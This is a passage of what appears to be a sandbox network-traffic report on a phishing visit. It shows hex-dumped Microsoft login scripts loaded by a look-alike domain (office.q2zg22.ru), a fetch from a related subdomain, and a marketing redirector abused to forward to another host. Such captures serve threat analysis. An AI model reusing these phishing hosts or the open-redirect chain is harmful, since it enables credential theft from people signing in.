                                                                                                                          2024-02-02 19:17:49 UTC16383INData Raw: 64 69 6e 67 4d 6f 64 65 3d 64 2e 48 69 64 69 6e 67 4d 6f 64 65 2e 4e 6f 6e 65 29 2c 73 2e 65 76 65 6e 74 49 64 29 7b 28 72 3d 7b 7d 29 2e 65 76 65 6e 74 54 79 70 65 3d 74 2c 72 2e 65 76 65 6e 74 49 64 3d 73 2e 65 76 65 6e 74 49 64 2c 72 2e 65 76 65 6e 74 4c 65 76 65 6c 3d 73 2e 65 76 65 6e 74 4c 65 76 65 6c 7c 7c 64 2e 45 76 65 6e 74 4c 65 76 65 6c 2e 41 70 69 52 65 71 75 65 73 74 3b 76 61 72 20 6c 3d 7b 7d 3b 6c 2e 72 65 71 75 65 73 74 54 69 6d 65 6f 75 74 3d 69 2c 61 26 26 28 6c 2e 63 6f 6e 74 65 6e 74 54 79 70 65 3d 61 29 2c 6c 2e 72 65 71 75 65 73 74 54 79 70 65 3d 74 2c 6f 26 26 28 6c 2e 6e 6f 43 61 6c 6c 62 61 63 6b 3d 21 30 29 2c 72 2e 65 76 65 6e 74 41 72 67 73 3d 6c 2c 72 2e 65 76 65 6e 74 4f 70 74 69 6f 6e 73 3d 73 2c 63 2e 74 72 61 63 65 42 65
                                                                                                                          Data Ascii: dingMode=d.HidingMode.None),s.eventId){(r={}).eventType=t,r.eventId=s.eventId,r.eventLevel=s.eventLevel||d.EventLevel.ApiRequest;var l={};l.requestTimeout=i,a&&(l.contentType=a),l.requestType=t,o&&(l.noCallback=!0),r.eventArgs=l,r.eventOptions=s,c.traceBe
                                                                                                                          2024-02-02 19:17:49 UTC16383INData Raw: 65 6e 65 72 61 74 65 52 65 71 75 65 73 74 53 74 72 69 6e 67 28 6d 29 2c 69 73 41 73 79 6e 63 3a 21 30 2c 74 69 6d 65 6f 75 74 3a 5f 2c 73 75 63 63 65 73 73 43 61 6c 6c 62 61 63 6b 3a 79 2c 66 61 69 6c 75 72 65 43 61 6c 6c 62 61 63 6b 3a 6b 2c 74 69 6d 65 6f 75 74 43 61 6c 6c 62 61 63 6b 3a 54 7d 2c 69 2e 48 61 6e 64 6c 65 72 2e 63 61 6c 6c 28 64 2c 63 29 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 76 61 72 20 69 3d 74 28 32 35 29 2c 61 3d 74 28 39 29 2c 6f 3d 74 28 33 37 29 2c 72 3d 74 28 35 29 2c 73 3d 77 69 6e 64 6f 77 2c 63 3d 73 2e 6e 61 76 69 67 61 74 6f 72 2c 64 3d 73 2e 53 65 72 76 65 72 44 61 74 61 2e 66 53 68 6f 75 6c 64 50 6c 61 74 66 6f 72 6d 4b 65 79 42 65 53 75 70 70 72 65 73 73 65 64 3b 6e 2e 6d 61 6b 65 43 72 65 64 65 6e 74 69
                                                                                                                          Data Ascii: enerateRequestString(m),isAsync:!0,timeout:_,successCallback:y,failureCallback:k,timeoutCallback:T},i.Handler.call(d,c)}},function(e,n,t){var i=t(25),a=t(9),o=t(37),r=t(5),s=window,c=s.navigator,d=s.ServerData.fShouldPlatformKeyBeSuppressed;n.makeCredenti
                                                                                                                          2024-02-02 19:17:49 UTC16383INData Raw: 69 74 48 75 62 3a 69 2e 69 64 70 52 65 64 69 72 65 63 74 55 72 6c 3d 6e 2e 43 72 65 64 65 6e 74 69 61 6c 73 2e 47 69 74 48 75 62 50 61 72 61 6d 73 2e 47 69 74 68 75 62 52 65 64 69 72 65 63 74 55 72 6c 2c 69 2e 69 64 70 52 65 64 69 72 65 63 74 50 72 6f 76 69 64 65 72 3d 79 2e 47 69 74 48 75 62 3b 62 72 65 61 6b 3b 63 61 73 65 20 6d 2e 47 6f 6f 67 6c 65 3a 69 2e 69 64 70 52 65 64 69 72 65 63 74 55 72 6c 3d 6e 2e 43 72 65 64 65 6e 74 69 61 6c 73 2e 47 6f 6f 67 6c 65 50 61 72 61 6d 73 2e 47 6f 6f 67 6c 65 52 65 64 69 72 65 63 74 55 72 6c 2c 69 2e 69 64 70 52 65 64 69 72 65 63 74 50 72 6f 76 69 64 65 72 3d 79 2e 47 6f 6f 67 6c 65 3b 62 72 65 61 6b 3b 63 61 73 65 20 6d 2e 46 61 63 65 62 6f 6f 6b 3a 69 2e 69 64 70 52 65 64 69 72 65 63 74 55 72 6c 3d 6e 2e 43 72
                                                                                                                          Data Ascii: itHub:i.idpRedirectUrl=n.Credentials.GitHubParams.GithubRedirectUrl,i.idpRedirectProvider=y.GitHub;break;case m.Google:i.idpRedirectUrl=n.Credentials.GoogleParams.GoogleRedirectUrl,i.idpRedirectProvider=y.Google;break;case m.Facebook:i.idpRedirectUrl=n.Cr
                                                                                                                          2024-02-02 19:17:49 UTC16383INData Raw: 52 5f 55 73 65 4c 69 6e 6b 65 64 49 6e 5f 4c 69 6e 6b 7d 2c 52 5b 6d 2e 47 69 74 48 75 62 5d 3d 7b 63 72 65 64 49 64 3a 22 75 73 65 47 69 74 48 75 62 4c 69 6e 6b 22 2c 63 72 65 64 54 65 78 74 3a 43 2e 43 54 5f 50 57 44 5f 53 54 52 5f 55 73 65 47 69 74 48 75 62 5f 4c 69 6e 6b 7d 2c 52 5b 6d 2e 47 6f 6f 67 6c 65 5d 3d 7b 63 72 65 64 49 64 3a 22 75 73 65 47 6f 6f 67 6c 65 4c 69 6e 6b 22 2c 63 72 65 64 54 65 78 74 3a 43 2e 43 54 5f 50 57 44 5f 53 54 52 5f 55 73 65 47 6f 6f 67 6c 65 5f 4c 69 6e 6b 7d 2c 52 5b 6d 2e 46 61 63 65 62 6f 6f 6b 5d 3d 7b 63 72 65 64 49 64 3a 22 75 73 65 47 6f 6f 67 6c 65 4c 69 6e 6b 22 2c 63 72 65 64 54 65 78 74 3a 43 2e 43 54 5f 50 57 44 5f 53 54 52 5f 55 73 65 46 61 63 65 62 6f 6f 6b 5f 4c 69 6e 6b 7d 2c 52 5b 6d 2e 46 65 64 65 72
                                                                                                                          Data Ascii: R_UseLinkedIn_Link},R[m.GitHub]={credId:"useGitHubLink",credText:C.CT_PWD_STR_UseGitHub_Link},R[m.Google]={credId:"useGoogleLink",credText:C.CT_PWD_STR_UseGoogle_Link},R[m.Facebook]={credId:"useGoogleLink",credText:C.CT_PWD_STR_UseFacebook_Link},R[m.Feder
                                                                                                                          2024-02-02 19:17:49 UTC16383INData Raw: 74 69 6f 6e 29 29 3b 72 65 74 75 72 6e 20 74 7d 28 29 3b 74 72 79 7b 6f 2e 53 65 6e 64 54 65 6c 65 6d 65 74 72 79 50 65 72 66 44 61 74 61 28 65 2c 22 4c 50 65 72 66 22 29 7d 63 61 74 63 68 28 6e 29 7b 7d 7d 28 29 7d 29 2c 30 29 7d 2c 6e 2e 73 65 74 43 75 73 74 6f 6d 50 61 67 65 4c 6f 61 64 43 6f 6d 70 6c 65 74 65 64 54 69 6d 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 3d 65 7c 7c 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 7d 2c 74 7c 7c 73 65 74 54 69 6d 65 6f 75 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 73 65 74 50 61 67 65 4c 6f 61 64 43 6f 6d 70 6c 65 74 65 64 28 29 7d 29 2c 31 30 30 29 7d 69 2e 63 6f 6d 70 6f 6e 65 6e 74 73 2e 72 65 67 69 73 74 65 72 28 22 69 6e 73 74 72 75 6d 65 6e 74 61 74 69 6f 6e 2d 63 6f 6e 74 72 6f 6c 22
                                                                                                                          Data Ascii: tion));return t}();try{o.SendTelemetryPerfData(e,"LPerf")}catch(n){}}()}),0)},n.setCustomPageLoadCompletedTime=function(e){a=e||(new Date).getTime()},t||setTimeout((function(){n.setPageLoadCompleted()}),100)}i.components.register("instrumentation-control"
                                                                                                                          2024-02-02 19:17:49 UTC16383INData Raw: 20 74 3d 65 2e 73 70 6c 69 74 28 22 2e 22 29 2c 69 3d 53 2c 61 3d 30 3b 61 3c 74 2e 6c 65 6e 67 74 68 2d 31 3b 61 2b 2b 29 69 3d 69 5b 74 5b 61 5d 5d 3b 69 5b 74 5b 74 2e 6c 65 6e 67 74 68 2d 31 5d 5d 3d 6e 7d 2c 53 2e 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 65 5b 6e 5d 3d 74 7d 2c 53 2e 76 65 72 73 69 6f 6e 3d 22 33 2e 35 2e 31 22 2c 53 2e 62 28 22 76 65 72 73 69 6f 6e 22 2c 53 2e 76 65 72 73 69 6f 6e 29 2c 53 2e 6f 70 74 69 6f 6e 73 3d 7b 64 65 66 65 72 55 70 64 61 74 65 73 3a 21 31 2c 75 73 65 4f 6e 6c 79 4e 61 74 69 76 65 45 76 65 6e 74 73 3a 21 31 2c 66 6f 72 65 61 63 68 48 69 64 65 73 44 65 73 74 72 6f 79 65 64 3a 21 31 7d 2c 53 2e 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 6e 29 7b 66 6f 72 28 76 61
                                                                                                                          Data Ascii: t=e.split("."),i=S,a=0;a<t.length-1;a++)i=i[t[a]];i[t[t.length-1]]=n},S.L=function(e,n,t){e[n]=t},S.version="3.5.1",S.b("version",S.version),S.options={deferUpdates:!1,useOnlyNativeEvents:!1,foreachHidesDestroyed:!1},S.a=function(){function e(e,n){for(va


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          29192.168.2.1649751152.199.4.444435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:49 UTC638OUTGET /ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_pwhoosk_q-bz40xlez3ihq2.js HTTP/1.1
                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          Origin: https://office.q2zg22.ru
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://office.q2zg22.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:17:49 UTC749INHTTP/1.1 200 OK
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                          Age: 4771648
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Content-MD5: BvJw428lx+F6l+8WmIOfEA==
                                                                                                                          Content-Type: application/x-javascript
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:49 GMT
                                                                                                                          Etag: 0x8DBF77BB998D52E
                                                                                                                          Last-Modified: Thu, 07 Dec 2023 23:24:56 GMT
                                                                                                                          Server: ECAcc (aga/86E6)
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Cache: HIT
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-request-id: 0fa9da09-a01e-00c5-31a6-2a5968000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          Content-Length: 52995
                                                                                                                          Connection: close
                                                                                                                          2024-02-02 19:17:49 UTC16383INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 69 5b 6e 5d 29 72 65 74 75 72 6e 20 69 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 74 3d 69 5b 6e 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 2c 69 64 3a 6e 2c 6c 6f 61 64 65 64 3a 21 31 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 74 2e 65 78 70 6f 72 74 73 2c 74 2c 74 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 74 2e 6c 6f 61 64 65 64 3d 21 30 2c 74 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 69 3d 7b 7d 3b 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 69 2c 6f 2e 70 3d 22 22 2c 6f 28 30 29 7d 28 5b 66 75 6e 63 74 69 6f 6e 28 65 2c 6f 2c 69 29 7b 69 28 32 29 3b 76 61 72 20 6e 3d 69 28 31 29 2c 74 3d 69 28 35 29 2c 72 3d 69 28 36 29 2c 61 3d 72 2e 53 74 72 69 6e
                                                                                                                          Data Ascii: !function(e){function o(n){if(i[n])return i[n].exports;var t=i[n]={exports:{},id:n,loaded:!1};return e[n].call(t.exports,t,t.exports,o),t.loaded=!0,t.exports}var i={};return o.m=e,o.c=i,o.p="",o(0)}([function(e,o,i){i(2);var n=i(1),t=i(5),r=i(6),a=r.Strin
                                                                                                                          2024-02-02 19:17:49 UTC1INData Raw: 44
                                                                                                                          Data Ascii: D
                                                                                                                          2024-02-02 19:17:49 UTC16383INData Raw: 65 73 63 72 69 70 74 69 6f 6e 5f 55 6e 66 61 6d 69 6c 69 61 72 44 65 76 69 63 65 3d 22 54 6f 20 73 69 67 6e 20 69 6e 20 77 69 74 68 20 7b 30 7d 2c 20 70 6c 65 61 73 65 20 66 6f 6c 6c 6f 77 20 74 68 65 20 69 6e 73 74 72 75 63 74 69 6f 6e 73 20 6f 6e 20 79 6f 75 72 20 70 68 6f 6e 65 20 61 6e 64 20 65 6e 74 65 72 20 74 68 65 20 6e 75 6d 62 65 72 20 79 6f 75 20 73 65 65 20 62 65 6c 6f 77 2e 22 2c 65 2e 43 54 5f 52 4e 47 43 5f 53 54 52 5f 4c 53 5f 54 69 6d 65 6f 75 74 5f 54 69 74 6c 65 3d 22 52 65 71 75 65 73 74 20 74 69 6d 65 6f 75 74 22 2c 65 2e 43 54 5f 52 4e 47 43 5f 53 54 52 5f 4c 53 5f 54 69 6d 65 6f 75 74 5f 50 61 67 65 44 65 73 63 72 69 70 74 69 6f 6e 3d 22 57 65 20 64 69 64 6e 27 74 20 68 65 61 72 20 66 72 6f 6d 20 79 6f 75 20 69 6e 20 74 69 6d 65 2e
                                                                                                                          Data Ascii: escription_UnfamiliarDevice="To sign in with {0}, please follow the instructions on your phone and enter the number you see below.",e.CT_RNGC_STR_LS_Timeout_Title="Request timeout",e.CT_RNGC_STR_LS_Timeout_PageDescription="We didn't hear from you in time.
                                                                                                                          2024-02-02 19:17:49 UTC16383INData Raw: 31 31 79 43 6f 6e 66 6f 72 6d 65 5f 54 65 78 74 3d 22 41 63 63 65 73 73 69 62 69 6c 69 74 79 3a 20 50 61 72 74 69 61 6c 6c 79 20 63 6f 6d 70 6c 69 61 6e 74 22 2c 6f 2e 6c 6f 63 61 6c 65 26 26 6f 2e 6c 6f 63 61 6c 65 2e 6c 63 69 64 26 26 31 30 34 30 3d 3d 6f 2e 6c 6f 63 61 6c 65 2e 6c 63 69 64 26 26 28 65 2e 57 46 5f 53 54 52 5f 46 6f 6f 74 65 72 5f 4c 69 6e 6b 41 31 31 79 43 6f 6e 66 6f 72 6d 65 5f 54 65 78 74 3d 22 41 63 63 65 73 73 69 62 69 6c 69 74 79 22 29 2c 65 2e 43 54 5f 53 54 52 5f 4d 6f 72 65 5f 4f 70 74 69 6f 6e 73 5f 45 6c 6c 69 70 73 69 73 5f 41 72 69 61 4c 61 62 65 6c 3d 22 43 6c 69 63 6b 20 68 65 72 65 20 66 6f 72 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 22 2c 65 2e 43 54 5f 53 54 52 5f 45 72 72 6f
                                                                                                                          Data Ascii: 11yConforme_Text="Accessibility: Partially compliant",o.locale&&o.locale.lcid&&1040==o.locale.lcid&&(e.WF_STR_Footer_LinkA11yConforme_Text="Accessibility"),e.CT_STR_More_Options_Ellipsis_AriaLabel="Click here for troubleshooting information",e.CT_STR_Erro
                                                                                                                          2024-02-02 19:17:49 UTC3845INData Raw: 64 65 72 61 74 69 6f 6e 3a 34 2c 43 6c 6f 75 64 46 65 64 65 72 61 74 69 6f 6e 3a 35 2c 4f 74 68 65 72 4d 69 63 72 6f 73 6f 66 74 49 64 70 46 65 64 65 72 61 74 69 6f 6e 3a 36 2c 46 69 64 6f 3a 37 2c 47 69 74 48 75 62 3a 38 2c 50 75 62 6c 69 63 49 64 65 6e 74 69 66 69 65 72 43 6f 64 65 3a 39 2c 4c 69 6e 6b 65 64 49 6e 3a 31 30 2c 52 65 6d 6f 74 65 4c 6f 67 69 6e 3a 31 31 2c 47 6f 6f 67 6c 65 3a 31 32 2c 41 63 63 65 73 73 50 61 73 73 3a 31 33 2c 46 61 63 65 62 6f 6f 6b 3a 31 34 2c 43 65 72 74 69 66 69 63 61 74 65 3a 31 35 2c 4f 66 66 6c 69 6e 65 41 63 63 6f 75 6e 74 3a 31 36 2c 56 65 72 69 66 69 61 62 6c 65 43 72 65 64 65 6e 74 69 61 6c 3a 31 37 2c 4e 6f 50 72 65 66 65 72 72 65 64 43 72 65 64 65 6e 74 69 61 6c 3a 31 65 33 7d 2c 6f 2e 52 65 6d 6f 74 65 4e 67
                                                                                                                          Data Ascii: deration:4,CloudFederation:5,OtherMicrosoftIdpFederation:6,Fido:7,GitHub:8,PublicIdentifierCode:9,LinkedIn:10,RemoteLogin:11,Google:12,AccessPass:13,Facebook:14,Certificate:15,OfflineAccount:16,VerifiableCredential:17,NoPreferredCredential:1e3},o.RemoteNg


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          30192.168.2.1649756104.21.85.1894435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:49 UTC957OUTGET /Me.htm?v=3 HTTP/1.1
                                                                                                                          Host: ywnjb.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Purpose: prefetch
                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Referer: https://office.q2zg22.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; cf_clearance=ce0oW76mtANxPk_4kyc3mBk42cWWnIOKaijg4RusDUc-1706901468-1-AeslQiFkGHYQohQV1EPcN2JU227xaAZFWW3gC7kcE9vFnxHvJuY8AnBotsMwex+qA7cxzTMhs69XAR33CiBa1pk=
                                                                                                                          2024-02-02 19:17:49 UTC1162INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:49 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          Expires: Mon, 30 Jan 2034 19:17:49 GMT
                                                                                                                          P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                          Ppserver: PPV: 30 H: SN1PEPF00010F67 V: 0
                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                          Set-Cookie: uaid=b5123cc0b5d34caeb3ca87efc9184692; Path=/; Domain=ywnjb.q2zg22.ru; HttpOnly; Secure; SameSite=None
                                                                                                                          Set-Cookie: MSPRequ=id=N&lt=1706901469&co=1; Path=/; Domain=ywnjb.q2zg22.ru; HttpOnly; Secure; SameSite=None
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Ms-Request-Id: 2693d5f6-1a58-4f22-ae12-0399466201b4
                                                                                                                          X-Ms-Route-Info: C106_SN1
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ev7Q%2FZvfnTNxTbIC%2FIgfVbl3hS%2BqMSnYGG7ADEpv5k9U%2FERKJgnDN%2FmIhqiEakQdkWY%2F2FxgMunnEJKhRNu8AqEQyEYZwmqzAqsnd%2FrgWjdWb59viEBWVoxmnA0Gmz0hBbg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c6c78ff86785-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:17:49 UTC207INData Raw: 39 31 39 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 21 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 66 6f 72 28 76 61 72 20 65 20 69 6e 20 74 29 6e 5b 65 5d 3d 74 5b 65 5d 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 69 29 7b 69 66 28 65 5b 69 5d 29 72 65 74 75 72 6e 20 65 5b 69 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 73 3d 65 5b 69 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 2c 69 64 3a 69 2c 6c 6f 61 64 65 64 3a 21 31 7d 3b 72 65 74 75 72 6e 20 6e 5b 69 5d 2e 63 61 6c 6c 28 73 2e 65 78 70 6f 72 74 73 2c 73 2c 73 2e 65
                                                                                                                          Data Ascii: 919<script type="text/javascript">!function(n,t){for(var e in t)n[e]=t[e]}(this,function(n){function t(i){if(e[i])return e[i].exports;var s=e[i]={exports:{},id:i,loaded:!1};return n[i].call(s.exports,s,s.e
                                                                                                                          2024-02-02 19:17:49 UTC1369INData Raw: 78 70 6f 72 74 73 2c 74 29 2c 73 2e 6c 6f 61 64 65 64 3d 21 30 2c 73 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 65 3d 7b 7d 3b 72 65 74 75 72 6e 20 74 2e 6d 3d 6e 2c 74 2e 63 3d 65 2c 74 2e 70 3d 22 22 2c 74 28 30 29 7d 28 5b 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 6e 29 7b 66 6f 72 28 76 61 72 20 74 3d 67 5b 63 5d 2c 65 3d 30 2c 69 3d 74 2e 6c 65 6e 67 74 68 3b 65 3c 69 3b 2b 2b 65 29 69 66 28 74 5b 65 5d 3d 3d 3d 6e 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 69 28 6e 29 7b 69 66 28 21 6e 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 66 6f 72 28 76 61 72 20 74 3d 6e 2b 22 3d 22 2c 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 73 70 6c 69 74 28 22 3b 22 29 2c 69 3d 30 2c 73 3d 65 2e
                                                                                                                          Data Ascii: xports,t),s.loaded=!0,s.exports}var e={};return t.m=n,t.c=e,t.p="",t(0)}([function(n,t){function e(n){for(var t=g[c],e=0,i=t.length;e<i;++e)if(t[e]===n)return!0;return!1}function i(n){if(!n)return null;for(var t=n+"=",e=document.cookie.split(";"),i=0,s=e.
                                                                                                                          2024-02-02 19:17:49 UTC760INData Raw: 73 65 72 4c 69 73 74 2c 65 29 7d 63 61 74 63 68 28 6f 29 7b 74 2e 65 72 72 6f 72 3d 6f 2e 6d 65 73 73 61 67 65 7d 6e 26 26 6c 2e 70 61 72 65 6e 74 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 2c 6e 29 7d 76 61 72 20 6c 3d 77 69 6e 64 6f 77 2c 63 3d 22 70 72 6f 64 22 2c 70 3d 22 22 2c 66 3d 22 22 2c 64 3d 7b 4e 6f 6e 65 3a 30 2c 53 69 67 6e 65 64 49 6e 54 6f 52 50 3a 31 2c 53 69 67 6e 65 64 49 6e 54 6f 49 44 50 3a 32 2c 52 65 6d 65 6d 62 65 72 65 64 3a 33 7d 2c 75 3d 7b 4e 6f 6e 65 3a 30 2c 49 73 57 69 6e 64 6f 77 73 53 73 6f 3a 31 7d 2c 67 3d 7b 64 65 76 3a 5b 70 2c 66 5d 2c 22 69 6e 74 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 77 69 6e 64 6f 77 73 2d 70 70 65 2e 6e 65 74 22 5d 2c 70 72 6f 64 3a 5b
                                                                                                                          Data Ascii: serList,e)}catch(o){t.error=o.message}n&&l.parent.postMessage(JSON.stringify(t),n)}var l=window,c="prod",p="",f="",d={None:0,SignedInToRP:1,SignedInToIDP:2,Remembered:3},u={None:0,IsWindowsSso:1},g={dev:[p,f],"int":["https://login.windows-ppe.net"],prod:[
                                                                                                                          2024-02-02 19:17:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          31192.168.2.164972935.181.229.1384435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:49 UTC1117OUTGET /c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=//galeonconstruction.com/nin/niit HTTP/1.1
                                                                                                                          Host: sushishop.commander1.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: tc_cj_v2=%20%28%7B%24%27%24%29%22ZZZ%29%20%2A%27%7B%29%20ZZZKQJPSJKNPKJJJZZZ%5Dfc%5De; tc_cj_v2_cmp=LJLMKKLQy%20%28%7B%24%27y-%20%27%7B%29%7D%20y%7B%2B%2BMJy%7C%20%21-; tc_cj_v2_med=%7B%7D%2F0; TCID=16fae09848cf2bf078ca3f065e274a8a; TCSESSION=20240202201741992404317; TCREDIRECT=1; TCREDIRECT_DEDUP=1
                                                                                                                          2024-02-02 19:17:49 UTC1386INHTTP/1.1 302 Found
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:49 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
                                                                                                                          Set-Cookie: tc_cj_v2=%20%28%7B%24%27%24%29%22ZZZ%29%20%2A%27%7B%29%20ZZZKQJPSJKNPSJJJZZZ%5Dfc%5De; expires=Sat, 01-Feb-2025 19:17:49 GMT; Max-Age=31536000; path=/; domain=sushishop.commander1.com; secure; SameSite=None
                                                                                                                          Set-Cookie: tc_cj_v2_cmp=LJLMKKLQy%20%28%7B%24%27y-%20%27%7B%29%7D%20y%7B%2B%2BMJy%7C%20%21-; expires=Sat, 01-Feb-2025 19:17:49 GMT; Max-Age=31536000; path=/; domain=sushishop.commander1.com; secure; SameSite=None
                                                                                                                          Set-Cookie: tc_cj_v2_med=%7B%7D%2F0; expires=Sat, 01-Feb-2025 19:17:49 GMT; Max-Age=31536000; path=/; domain=sushishop.commander1.com; secure; SameSite=None
                                                                                                                          Set-Cookie: TCID=16fae09848cf2bf078ca3f065e274a8a; expires=Sat, 01-Feb-2025 19:17:49 GMT; Max-Age=31536000; path=/; domain=.commander1.com; secure; SameSite=None
